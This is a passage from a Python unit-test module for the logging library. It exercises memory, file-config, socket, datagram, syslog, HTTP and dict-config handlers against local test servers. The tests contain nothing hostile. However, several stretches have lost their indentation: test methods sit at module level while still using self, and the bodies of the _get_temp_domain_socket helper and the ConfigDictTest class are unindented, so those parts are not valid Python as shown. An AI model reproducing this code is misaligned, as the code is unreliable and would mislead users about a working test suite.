        self.assertEqual(h.toaddrs, ['you'])
        self.messages = []
        r = logging.makeLogRecord({'msg': 'Hello \u2713'})
        self.handled = threading.Event()
        h.handle(r)
        # Wait (bounded) for process_message() to run on the server thread.
        self.handled.wait(self.TIMEOUT)
        server.stop()
        self.assertTrue(self.handled.is_set())
        self.assertEqual(len(self.messages), 1)
        peer, mailfrom, rcpttos, data = self.messages[0]
        self.assertEqual(mailfrom, 'me')
        self.assertEqual(rcpttos, ['you'])
        self.assertIn('\nSubject: Log\n', data)
        self.assertTrue(data.endswith('\n\nHello \u2713'))
        h.close()

    def process_message(self, *args):
        # Runs on the server thread with (peer, mailfrom, rcpttos, data).
        self.messages.append(args)
        self.handled.set()
class MemoryHandlerTest(BaseTest):

    """Tests for the MemoryHandler."""

    # Do not bother with a logger name group.
    expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"

    def setUp(self):
        BaseTest.setUp(self)
        # Buffer up to 10 records; flush on WARNING or above, into the
        # root handler set up by BaseTest.
        self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
                                                       self.root_hdlr)
        self.mem_logger = logging.getLogger('mem')
        self.mem_logger.propagate = 0
        self.mem_logger.addHandler(self.mem_hdlr)

    def tearDown(self):
        self.mem_hdlr.close()
        BaseTest.tearDown(self)

    def test_flush(self):
        # The memory handler flushes to its target handler based on specific
        # criteria (message count and message level).
        self.mem_logger.debug(self.next_message())
        self.assert_log_lines([])
        self.mem_logger.info(self.next_message())
        self.assert_log_lines([])
        # This will flush because the level is >= logging.WARNING
        self.mem_logger.warning(self.next_message())
        lines = [
            ('DEBUG', '1'),
            ('INFO', '2'),
            ('WARNING', '3'),
        ]
        self.assert_log_lines(lines)
        for n in (4, 14):
            # Nine buffered records do not trigger a flush yet...
            for i in range(9):
                self.mem_logger.debug(self.next_message())
            self.assert_log_lines(lines)
            # This will flush because it's the 10th message since the last
            # flush.
            self.mem_logger.debug(self.next_message())
            lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
            self.assert_log_lines(lines)

        self.mem_logger.debug(self.next_message())
        self.assert_log_lines(lines)

    def test_flush_on_close(self):
        """
        Test that the flush-on-close configuration works as expected.
        """
        self.mem_logger.debug(self.next_message())
        self.assert_log_lines([])
        self.mem_logger.info(self.next_message())
        self.assert_log_lines([])
        self.mem_logger.removeHandler(self.mem_hdlr)
        # Default behaviour is to flush on close. Check that it happens.
        self.mem_hdlr.close()
        lines = [
            ('DEBUG', '1'),
            ('INFO', '2'),
        ]
        self.assert_log_lines(lines)
        # Now configure for flushing not to be done on close.
        self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
                                                       self.root_hdlr,
                                                       False)
        self.mem_logger.addHandler(self.mem_hdlr)
        self.mem_logger.debug(self.next_message())
        self.assert_log_lines(lines)  # no change
        self.mem_logger.info(self.next_message())
        self.assert_log_lines(lines)  # no change
        self.mem_logger.removeHandler(self.mem_hdlr)
        self.mem_hdlr.close()
        # assert that no new lines have been added
        self.assert_log_lines(lines)  # no change
class ExceptionFormatter(logging.Formatter):

    """A special exception formatter."""

    def formatException(self, ei):
        # Report just the exception class name instead of a full traceback.
        exc_type = ei[0]
        return "Got a [%s]" % exc_type.__name__
class ConfigFileTest(BaseTest):

    """Reading logging config from a .ini-style config file."""

    check_no_resource_warning = support.check_no_resource_warning
    expected_log_pat = r"^(\w+) \+\+ (\w+)$"

    # config0 is a standard configuration.
    config0 = """
[loggers]
keys=root

[handlers]
keys=hand1

[formatters]
keys=form1

[logger_root]
level=WARNING
handlers=hand1

[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)

[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""

    # config1 adds a little to the standard configuration.
    config1 = """
[loggers]
keys=root,parser

[handlers]
keys=hand1

[formatters]
keys=form1

[logger_root]
level=WARNING
handlers=

[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser

[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)

[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""

    # config1a moves the handler to the root.
    config1a = """
[loggers]
keys=root,parser

[handlers]
keys=hand1

[formatters]
keys=form1

[logger_root]
level=WARNING
handlers=hand1

[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser

[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)

[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""

    # config2 has a subtle configuration error that should be reported
    config2 = config1.replace("sys.stdout", "sys.stbout")

    # config3 has a less subtle configuration error
    config3 = config1.replace("formatter=form1", "formatter=misspelled_name")

    # config4 specifies a custom formatter class to be loaded
    config4 = """
[loggers]
keys=root

[handlers]
keys=hand1

[formatters]
keys=form1

[logger_root]
level=NOTSET
handlers=hand1

[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)

[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""

    # config5 specifies a custom handler class to be loaded
    config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')

    # config6 uses ', ' delimiters in the handlers and formatters sections
    config6 = """
[loggers]
keys=root,parser

[handlers]
keys=hand1, hand2

[formatters]
keys=form1, form2

[logger_root]
level=WARNING
handlers=

[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser

[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)

[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)

[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=

[formatter_form2]
format=%(message)s
datefmt=
"""

    # config7 adds a compiler logger, and uses kwargs instead of args.
    config7 = """
[loggers]
keys=root,parser,compiler

[handlers]
keys=hand1

[formatters]
keys=form1

[logger_root]
level=WARNING
handlers=hand1

[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler

[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser

[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
kwargs={'stream': sys.stdout,}

[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""

    # config 8, check for resource warning
    # ("{tempfile}" is substituted with a real path before use)
    config8 = r"""
[loggers]
keys=root

[handlers]
keys=file

[formatters]
keys=

[logger_root]
level=DEBUG
handlers=file

[handler_file]
class=FileHandler
level=DEBUG
args=("{tempfile}",)
"""

    disable_test = """
[loggers]
keys=root

[handlers]
keys=screen

[formatters]
keys=

[logger_root]
level=DEBUG
handlers=screen

[handler_screen]
level=DEBUG
class=StreamHandler
args=(sys.stdout,)
formatter=
"""
def apply_config(self, conf, **kwargs):
    """Feed *conf* (a config-file string) to logging.config.fileConfig().

    The string is dedented first so configs may be written indented
    inline; extra keyword args are forwarded to fileConfig().
    """
    stream = io.StringIO(textwrap.dedent(conf))
    logging.config.fileConfig(stream, **kwargs)
def test_config0_ok(self):
    """config0 overrides the default settings: only ERROR gets through."""
    with support.captured_stdout() as captured:
        self.apply_config(self.config0)
        root = logging.getLogger()
        root.info(self.next_message())    # dropped by the configured level
        root.error(self.next_message())   # emitted
        self.assert_log_lines([
            ('ERROR', '2'),
        ], stream=captured)
        # Nothing leaked to the original (BaseTest) stream.
        self.assert_log_lines([])
def test_config0_using_cp_ok(self):
    """Same as test_config0_ok, but hand fileConfig() a ConfigParser
    instance instead of a file-like object."""
    with support.captured_stdout() as captured:
        parser = configparser.ConfigParser()
        parser.read_file(io.StringIO(textwrap.dedent(self.config0)))
        logging.config.fileConfig(parser)
        root = logging.getLogger()
        root.info(self.next_message())    # dropped by the configured level
        root.error(self.next_message())   # emitted
        self.assert_log_lines([
            ('ERROR', '2'),
        ], stream=captured)
        # Nothing leaked to the original (BaseTest) stream.
        self.assert_log_lines([])
def test_config1_ok(self, config=config1):
    """A config file that also defines a 'compiler.parser' sub-logger."""
    with support.captured_stdout() as captured:
        self.apply_config(config)
        parser_logger = logging.getLogger("compiler.parser")
        # The sub-logger is at DEBUG: both records come through.
        parser_logger.info(self.next_message())
        parser_logger.error(self.next_message())
        self.assert_log_lines([
            ('INFO', '1'),
            ('ERROR', '2'),
        ], stream=captured)
        # Nothing leaked to the original (BaseTest) stream.
        self.assert_log_lines([])
def test_config2_failure(self):
    """fileConfig() must reject the (deliberately broken) config2."""
    with self.assertRaises(Exception):
        self.apply_config(self.config2)
def test_config3_failure(self):
    """fileConfig() must reject the (deliberately broken) config3."""
    with self.assertRaises(Exception):
        self.apply_config(self.config3)
def test_config4_ok(self):
    # A config file specifying a custom formatter class
    # (ExceptionFormatter, which appends "Got a [<type>]" after the
    # message when exception info is present -- see config4).
    with support.captured_stdout() as output:
        self.apply_config(self.config4)
        logger = logging.getLogger()  # NOTE(review): unused; kept for parity
        try:
            raise RuntimeError()
        except RuntimeError:
            logging.exception("just testing")
        sys.stdout.seek(0)
        self.assertEqual(output.getvalue(),
            "ERROR:root:just testing\nGot a [RuntimeError]\n")
        # Original logger output is empty
        self.assert_log_lines([])
def test_config5_ok(self):
    # config5 is config1 with the handler class spelled as a full dotted
    # path ('logging.StreamHandler'); behaviour must be identical.
    self.test_config1_ok(self.config5)
def test_config6_ok(self):
    # config6 uses ', '-delimited key lists in [handlers]/[formatters];
    # otherwise it behaves like config1.
    self.test_config1_ok(self.config6)
def test_config7_ok(self):
    """Re-applying a config keeps loggers it (re-)defines enabled."""
    # First apply config1a: handler on root, 'compiler.parser' at DEBUG.
    with support.captured_stdout() as output:
        self.apply_config(self.config1a)
        logger = logging.getLogger("compiler.parser")
        # See issue #11424. compiler-hyphenated sorts
        # between compiler and compiler.xyz and this
        # was preventing compiler.xyz from being included
        # in the child loggers of compiler because of an
        # overzealous loop termination condition.
        hyphenated = logging.getLogger('compiler-hyphenated')
        # All will output a message
        logger.info(self.next_message())
        logger.error(self.next_message())
        hyphenated.critical(self.next_message())
        self.assert_log_lines([
            ('INFO', '1'),
            ('ERROR', '2'),
            ('CRITICAL', '3'),
        ], stream=output)
        # Original logger output is empty.
        self.assert_log_lines([])
    # Now apply config7, which defines root, compiler and compiler.parser
    # but NOT compiler-hyphenated.
    with support.captured_stdout() as output:
        self.apply_config(self.config7)
        logger = logging.getLogger("compiler.parser")
        # 'compiler.parser' is re-defined by config7, so it stays enabled.
        self.assertFalse(logger.disabled)
        # Both will output a message
        logger.info(self.next_message())
        logger.error(self.next_message())
        logger = logging.getLogger("compiler.lexer")
        # Both will output a message
        logger.info(self.next_message())
        logger.error(self.next_message())
        # Will not appear
        hyphenated.critical(self.next_message())
        self.assert_log_lines([
            ('INFO', '4'),
            ('ERROR', '5'),
            ('INFO', '6'),
            ('ERROR', '7'),
        ], stream=output)
        # Original logger output is empty.
        self.assert_log_lines([])
def test_config8_ok(self):
    """Re-applying a FileHandler config must not leak the old file."""
    def cleanup(h1, fn):
        # Close the handler before deleting its file.
        h1.close()
        os.remove(fn)
    with self.check_no_resource_warning():
        fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
        os.close(fd)
        # Replace single backslash with double backslash in windows
        # to avoid unicode error during string formatting
        if os.name == "nt":
            fn = fn.replace("\\", "\\\\")
        config8 = self.config8.format(tempfile=fn)
        self.apply_config(config8)
        # Applying the same config again must close the first FileHandler
        # cleanly, i.e. without emitting a ResourceWarning.
        self.apply_config(config8)
    handler = logging.root.handlers[0]
    self.addCleanup(cleanup, handler, fn)
def test_logger_disabling(self):
    """fileConfig() disables pre-existing loggers unless told otherwise."""
    self.apply_config(self.disable_test)
    # A logger created *after* the config is applied starts enabled...
    probe = logging.getLogger('some_pristine_logger')
    self.assertFalse(probe.disabled)
    # ...but re-applying the config disables it (default behaviour)...
    self.apply_config(self.disable_test)
    self.assertTrue(probe.disabled)
    # ...unless disable_existing_loggers=False is passed.
    self.apply_config(self.disable_test, disable_existing_loggers=False)
    self.assertFalse(probe.disabled)
def test_defaults_do_no_interpolation(self):
    """bpo-33802 defaults should not get interpolated"""
    ini = textwrap.dedent("""
        [formatters]
        keys=default
        [formatter_default]
        [handlers]
        keys=console
        [handler_console]
        class=logging.StreamHandler
        args=tuple()
        [loggers]
        keys=root
        [logger_root]
        formatter=default
        handlers=console
        """).strip()
    fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.ini')
    try:
        os.write(fd, ini.encode('ascii'))
        os.close(fd)
        # The 'defaults' values below are full of '%'-placeholders; if
        # fileConfig let ConfigParser interpolate them, parsing would
        # raise.  Success here means defaults are passed through raw.
        logging.config.fileConfig(
            fn,
            defaults=dict(
                version=1,
                disable_existing_loggers=False,
                formatters={
                    "generic": {
                        "format": "%(asctime)s [%(process)d] [%(levelname)s] %(message)s",
                        "datefmt": "[%Y-%m-%d %H:%M:%S %z]",
                        "class": "logging.Formatter"
                    },
                },
            )
        )
    finally:
        os.unlink(fn)
class SocketHandlerTest(BaseTest):
    """Test for SocketHandler objects."""

    # Overridden by the Unix-domain-socket subclass.
    server_class = TestTCPServer
    address = ('localhost', 0)  # port 0: let the OS pick a free port

    def setUp(self):
        """Set up a TCP server to receive log messages, and a SocketHandler
        pointing to that server's address and port."""
        BaseTest.setUp(self)
        # Issue #29177: deal with errors that happen during setup
        self.server = self.sock_hdlr = self.server_exception = None
        try:
            self.server = server = self.server_class(self.address,
                                                     self.handle_socket, 0.01)
            server.start()
            # Uncomment next line to test error recovery in setUp()
            # raise OSError('dummy error raised')
        except OSError as e:
            # Remember the failure; each test skips itself if this is set.
            self.server_exception = e
            return
        server.ready.wait()
        hcls = logging.handlers.SocketHandler
        if isinstance(server.server_address, tuple):
            # TCP: (host, port) pair.
            self.sock_hdlr = hcls('localhost', server.port)
        else:
            # Unix domain socket: the address is a path string, no port.
            self.sock_hdlr = hcls(server.server_address, None)
        self.log_output = ''
        self.root_logger.removeHandler(self.root_logger.handlers[0])
        self.root_logger.addHandler(self.sock_hdlr)
        # Released once per record received by handle_socket().
        self.handled = threading.Semaphore(0)

    def tearDown(self):
        """Shutdown the TCP server."""
        try:
            if self.sock_hdlr:
                self.root_logger.removeHandler(self.sock_hdlr)
                self.sock_hdlr.close()
            if self.server:
                self.server.stop(2.0)
        finally:
            BaseTest.tearDown(self)

    def handle_socket(self, request):
        """Server-side reader: decode length-prefixed pickled records."""
        conn = request.connection
        while True:
            chunk = conn.recv(4)
            if len(chunk) < 4:
                break
            # SocketHandler sends a 4-byte big-endian length prefix,
            # followed by that many bytes of pickled record attributes.
            slen = struct.unpack(">L", chunk)[0]
            chunk = conn.recv(slen)
            while len(chunk) < slen:
                chunk = chunk + conn.recv(slen - len(chunk))
            obj = pickle.loads(chunk)
            record = logging.makeLogRecord(obj)
            self.log_output += record.msg + '\n'
            self.handled.release()

    def test_output(self):
        # The log message sent to the SocketHandler is properly received.
        if self.server_exception:
            self.skipTest(self.server_exception)
        logger = logging.getLogger("tcp")
        logger.error("spam")
        self.handled.acquire()  # wait until the server processed the record
        logger.debug("eggs")
        self.handled.acquire()
        self.assertEqual(self.log_output, "spam\neggs\n")

    def test_noserver(self):
        if self.server_exception:
            self.skipTest(self.server_exception)
        # Avoid timing-related failures due to SocketHandler's own hard-wired
        # one-second timeout on socket.create_connection() (issue #16264).
        self.sock_hdlr.retryStart = 2.5
        # Kill the server
        self.server.stop(2.0)
        # The logging call should try to connect, which should fail
        try:
            raise RuntimeError('Deliberate mistake')
        except RuntimeError:
            self.root_logger.exception('Never sent')
        self.root_logger.error('Never sent, either')
        now = time.time()
        # The failed connect must have scheduled a retry in the future.
        self.assertGreater(self.sock_hdlr.retryTime, now)
        time.sleep(self.sock_hdlr.retryTime - now + 0.001)
        self.root_logger.error('Nor this')
def _get_temp_domain_socket():
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.sock')
os.close(fd)
# just need a name - file can't be present, or we'll get an
# 'address already in use' error.
os.remove(fn)
return fn
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSocketHandlerTest(SocketHandlerTest):
    """SocketHandler over an AF_UNIX stream socket."""

    if hasattr(socket, "AF_UNIX"):
        server_class = TestUnixStreamServer

    def setUp(self):
        # Swap the inherited TCP address for a fresh domain-socket path.
        self.address = _get_temp_domain_socket()
        super().setUp()

    def tearDown(self):
        super().tearDown()
        support.unlink(self.address)
class DatagramHandlerTest(BaseTest):
    """Test for DatagramHandler."""

    # Overridden by the Unix-domain-socket subclass.
    server_class = TestUDPServer
    address = ('localhost', 0)  # port 0: let the OS pick a free port

    def setUp(self):
        """Set up a UDP server to receive log messages, and a DatagramHandler
        pointing to that server's address and port."""
        BaseTest.setUp(self)
        # Issue #29177: deal with errors that happen during setup
        self.server = self.sock_hdlr = self.server_exception = None
        try:
            self.server = server = self.server_class(self.address,
                                                     self.handle_datagram, 0.01)
            server.start()
            # Uncomment next line to test error recovery in setUp()
            # raise OSError('dummy error raised')
        except OSError as e:
            # Remember the failure; the test skips itself if this is set.
            self.server_exception = e
            return
        server.ready.wait()
        hcls = logging.handlers.DatagramHandler
        if isinstance(server.server_address, tuple):
            # UDP: (host, port) pair.
            self.sock_hdlr = hcls('localhost', server.port)
        else:
            # Unix domain socket: the address is a path string, no port.
            self.sock_hdlr = hcls(server.server_address, None)
        self.log_output = ''
        self.root_logger.removeHandler(self.root_logger.handlers[0])
        self.root_logger.addHandler(self.sock_hdlr)
        # Set once per datagram received by handle_datagram().
        self.handled = threading.Event()

    def tearDown(self):
        """Shutdown the UDP server."""
        try:
            if self.server:
                self.server.stop(2.0)
            if self.sock_hdlr:
                self.root_logger.removeHandler(self.sock_hdlr)
                self.sock_hdlr.close()
        finally:
            BaseTest.tearDown(self)

    def handle_datagram(self, request):
        # DatagramHandler also prepends a 4-byte length, but a UDP datagram
        # always carries the whole payload, so the prefix is just skipped.
        slen = struct.pack('>L', 0) # length of prefix
        packet = request.packet[len(slen):]
        obj = pickle.loads(packet)
        record = logging.makeLogRecord(obj)
        self.log_output += record.msg + '\n'
        self.handled.set()

    def test_output(self):
        # The log message sent to the DatagramHandler is properly received.
        if self.server_exception:
            self.skipTest(self.server_exception)
        logger = logging.getLogger("udp")
        logger.error("spam")
        self.handled.wait()   # wait for the server to process the datagram
        self.handled.clear()  # re-arm for the second message
        logger.error("eggs")
        self.handled.wait()
        self.assertEqual(self.log_output, "spam\neggs\n")
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixDatagramHandlerTest(DatagramHandlerTest):
    """DatagramHandler over an AF_UNIX datagram socket."""

    if hasattr(socket, "AF_UNIX"):
        server_class = TestUnixDatagramServer

    def setUp(self):
        # Swap the inherited UDP address for a fresh domain-socket path.
        self.address = _get_temp_domain_socket()
        super().setUp()

    def tearDown(self):
        super().tearDown()
        support.unlink(self.address)
class SysLogHandlerTest(BaseTest):
    """Test for SysLogHandler using UDP."""

    # Overridden by the Unix-socket and IPv6 subclasses.
    server_class = TestUDPServer
    address = ('localhost', 0)  # port 0: let the OS pick a free port

    def setUp(self):
        """Set up a UDP server to receive log messages, and a SysLogHandler
        pointing to that server's address and port."""
        BaseTest.setUp(self)
        # Issue #29177: deal with errors that happen during setup
        self.server = self.sl_hdlr = self.server_exception = None
        try:
            self.server = server = self.server_class(self.address,
                                                     self.handle_datagram, 0.01)
            server.start()
            # Uncomment next line to test error recovery in setUp()
            # raise OSError('dummy error raised')
        except OSError as e:
            # Remember the failure; the test skips itself if this is set.
            self.server_exception = e
            return
        server.ready.wait()
        hcls = logging.handlers.SysLogHandler
        if isinstance(server.server_address, tuple):
            # UDP: SysLogHandler takes a single (host, port) tuple.
            self.sl_hdlr = hcls((server.server_address[0], server.port))
        else:
            # Unix domain socket: the address is a path string.
            self.sl_hdlr = hcls(server.server_address)
        self.log_output = ''
        self.root_logger.removeHandler(self.root_logger.handlers[0])
        self.root_logger.addHandler(self.sl_hdlr)
        # Set once per datagram received by handle_datagram().
        self.handled = threading.Event()

    def tearDown(self):
        """Shutdown the server."""
        try:
            if self.server:
                self.server.stop(2.0)
            if self.sl_hdlr:
                self.root_logger.removeHandler(self.sl_hdlr)
                self.sl_hdlr.close()
        finally:
            BaseTest.tearDown(self)

    def handle_datagram(self, request):
        # Keep the raw packet so tests can check the exact wire bytes.
        self.log_output = request.packet
        self.handled.set()

    def test_output(self):
        if self.server_exception:
            self.skipTest(self.server_exception)
        # The log message sent to the SysLogHandler is properly received.
        logger = logging.getLogger("slh")
        logger.error("sp\xe4m")
        self.handled.wait()
        # '<11>' is the syslog priority: facility LOG_USER (1*8) +
        # severity LOG_ERR (3); the message is UTF-8 with a trailing NUL.
        self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
        self.handled.clear()
        # Without append_nul the trailing NUL byte is omitted.
        self.sl_hdlr.append_nul = False
        logger.error("sp\xe4m")
        self.handled.wait()
        self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
        self.handled.clear()
        # 'ident' is prepended verbatim to each message.
        self.sl_hdlr.ident = "h\xe4m-"
        logger.error("sp\xe4m")
        self.handled.wait()
        self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSysLogHandlerTest(SysLogHandlerTest):
    """SysLogHandler over an AF_UNIX datagram socket."""

    if hasattr(socket, "AF_UNIX"):
        server_class = TestUnixDatagramServer

    def setUp(self):
        # Swap the inherited UDP address for a fresh domain-socket path.
        self.address = _get_temp_domain_socket()
        super().setUp()

    def tearDown(self):
        super().tearDown()
        support.unlink(self.address)
@unittest.skipUnless(support.IPV6_ENABLED,
                     'IPv6 support required for this test.')
class IPv6SysLogHandlerTest(SysLogHandlerTest):
    """Test for SysLogHandler with IPv6 host."""

    server_class = TestUDPServer
    address = ('::1', 0)

    def setUp(self):
        # Temporarily switch the shared server class to IPv6.
        self.server_class.address_family = socket.AF_INET6
        super().setUp()

    def tearDown(self):
        # Restore the default family for other tests using the class.
        self.server_class.address_family = socket.AF_INET
        super().tearDown()
class HTTPHandlerTest(BaseTest):
    """Test for HTTPHandler."""

    def setUp(self):
        """Set up an HTTP server to receive log messages, and a HTTPHandler
        pointing to that server's address and port."""
        BaseTest.setUp(self)
        # Set once per request handled by handle_request().
        self.handled = threading.Event()

    def handle_request(self, request):
        """Server-side callback: record method, parsed path and POST body."""
        self.command = request.command
        self.log_data = urlparse(request.path)
        if self.command == 'POST':
            try:
                rlen = int(request.headers['Content-Length'])
                self.post_data = request.rfile.read(rlen)
            except Exception:
                # Missing/invalid Content-Length or a failed read: record
                # that no body arrived instead of crashing the server
                # thread.  (Narrowed from a bare ``except:``, which would
                # also have swallowed SystemExit/KeyboardInterrupt.)
                self.post_data = None
        request.send_response(200)
        request.end_headers()
        self.handled.set()

    def test_output(self):
        # The log message sent to the HTTPHandler is properly received.
        logger = logging.getLogger("http")
        root_logger = self.root_logger
        root_logger.removeHandler(self.root_logger.handlers[0])
        for secure in (False, True):
            addr = ('localhost', 0)
            if secure:
                try:
                    import ssl
                except ImportError:
                    # No ssl module: fall back to a plain server.
                    # (context keeps its value from the previous, insecure
                    # iteration, i.e. None.)
                    sslctx = None
                else:
                    here = os.path.dirname(__file__)
                    localhost_cert = os.path.join(here, "keycert.pem")
                    sslctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
                    sslctx.load_cert_chain(localhost_cert)
                    # Client-side context trusting the same self-signed cert.
                    context = ssl.create_default_context(cafile=localhost_cert)
            else:
                sslctx = None
                context = None
            self.server = server = TestHTTPServer(addr, self.handle_request,
                                                  0.01, sslctx=sslctx)
            server.start()
            server.ready.wait()
            host = 'localhost:%d' % server.server_port
            secure_client = secure and sslctx
            self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
                                                       secure=secure_client,
                                                       context=context,
                                                       credentials=('foo', 'bar'))
            self.log_data = None
            root_logger.addHandler(self.h_hdlr)

            for method in ('GET', 'POST'):
                self.h_hdlr.method = method
                self.handled.clear()
                msg = "sp\xe4m"
                logger.error(msg)
                self.handled.wait()
                self.assertEqual(self.log_data.path, '/frob')
                self.assertEqual(self.command, method)
                # Record attributes travel as a query string (GET) or a
                # urlencoded body (POST).
                if method == 'GET':
                    d = parse_qs(self.log_data.query)
                else:
                    d = parse_qs(self.post_data.decode('utf-8'))
                self.assertEqual(d['name'], ['http'])
                self.assertEqual(d['funcName'], ['test_output'])
                self.assertEqual(d['msg'], [msg])

            self.server.stop(2.0)
            self.root_logger.removeHandler(self.h_hdlr)
            self.h_hdlr.close()
class MemoryTest(BaseTest):
    """Test memory persistence of logger objects."""

    def setUp(self):
        """Create a dict to remember potentially destroyed objects."""
        BaseTest.setUp(self)
        self._survivors = {}

    def _watch_for_survival(self, *args):
        """Watch the given objects for survival, by creating weakrefs to
        them."""
        for obj in args:
            self._survivors[(id(obj), repr(obj))] = weakref.ref(obj)

    def _assertTruesurvival(self):
        """Assert that all objects watched for survival have survived."""
        # Trigger cycle breaking.
        gc.collect()
        dead = [repr_ for (_, repr_), ref in self._survivors.items()
                if ref() is None]
        if dead:
            self.fail("%d objects should have survived "
                "but have been destroyed: %s" % (len(dead), ", ".join(dead)))

    def test_persistent_loggers(self):
        # Logger objects are persistent and retain their configuration,
        # even after every visible reference has been dropped.
        self.root_logger.setLevel(logging.INFO)
        handle = logging.getLogger("foo")
        self._watch_for_survival(handle)
        handle.setLevel(logging.DEBUG)
        self.root_logger.debug(self.next_message())
        handle.debug(self.next_message())
        self.assert_log_lines([
            ('foo', 'DEBUG', '2'),
        ])
        del handle
        # The logger object survived the deletion...
        self._assertTruesurvival()
        # ...and getLogger() hands back the same one, DEBUG level intact.
        again = logging.getLogger("foo")
        again.debug(self.next_message())
        self.assert_log_lines([
            ('foo', 'DEBUG', '2'),
            ('foo', 'DEBUG', '3'),
        ])
class EncodingTest(BaseTest):
    """Encoding behaviour of FileHandler/StreamHandler output."""

    def test_encoding_plain_file(self):
        # In Python 2.x, a plain file object is treated as having no encoding.
        log = logging.getLogger("test")
        fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
        os.close(fd)
        data = "foo\x80"  # the non-ascii payload we log
        try:
            handler = logging.FileHandler(fn, encoding="utf-8")
            log.addHandler(handler)
            try:
                log.warning(data)  # write non-ascii data to the log
            finally:
                log.removeHandler(handler)
                handler.close()
            # Exactly those characters must be on disk (trailing \n aside).
            with open(fn, encoding="utf-8") as f:
                self.assertEqual(f.read().rstrip(), data)
        finally:
            if os.path.isfile(fn):
                os.remove(fn)

    def test_encoding_cyrillic_unicode(self):
        log = logging.getLogger("test")
        # "Do svidanya" (goodbye) in Cyrillic.
        message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
        # Route the handler's output through a cp1251 codec writer.
        writer_class = codecs.getwriter('cp1251')
        writer_class.encoding = 'cp1251'
        raw = io.BytesIO()
        handler = logging.StreamHandler(writer_class(raw, 'strict'))
        log.addHandler(handler)
        try:
            log.warning(message)
        finally:
            log.removeHandler(handler)
            handler.close()
        # The bytes written must be the CP-1251 encoding plus newline.
        self.assertEqual(raw.getvalue(),
                         b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
    """Redirection of the warnings module via logging.captureWarnings()."""

    def test_warnings(self):
        with warnings.catch_warnings():
            logging.captureWarnings(True)
            self.addCleanup(logging.captureWarnings, False)
            warnings.filterwarnings("always", category=UserWarning)
            buffer = io.StringIO()
            handler = logging.StreamHandler(buffer)
            warn_logger = logging.getLogger("py.warnings")
            warn_logger.addHandler(handler)
            # With capture on, the warning is routed to 'py.warnings'.
            warnings.warn("I'm warning you...")
            warn_logger.removeHandler(handler)
            text = buffer.getvalue()
            handler.close()
            self.assertGreater(text.find("UserWarning: I'm warning you...\n"), 0)

            # An explicit file argument bypasses the logging redirection
            # and uses the original showwarning implementation.
            sink = io.StringIO()
            warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
                                 sink, "Dummy line")
            text = sink.getvalue()
            sink.close()
            self.assertEqual(text,
                             "dummy.py:42: UserWarning: Explicit\n  Dummy line\n")

    def test_warnings_no_handlers(self):
        with warnings.catch_warnings():
            logging.captureWarnings(True)
            self.addCleanup(logging.captureWarnings, False)

            # confirm our assumption: no loggers are set
            warn_logger = logging.getLogger("py.warnings")
            self.assertEqual(warn_logger.handlers, [])

            # Capturing a warning with no handlers configured must add a
            # single NullHandler rather than print a 'no handlers' error.
            warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
            self.assertEqual(len(warn_logger.handlers), 1)
            self.assertIsInstance(warn_logger.handlers[0], logging.NullHandler)
def formatFunc(format, datefmt=None):
    """Factory used by the dict-config tests: build a plain Formatter."""
    return logging.Formatter(fmt=format, datefmt=datefmt)
def handlerFunc():
    """Factory used by the dict-config tests: a default StreamHandler."""
    handler = logging.StreamHandler()
    return handler
class CustomHandler(logging.StreamHandler):
    # Distinct subclass used by the config tests to verify that custom
    # handler classes can be resolved by name and instantiated.
    pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
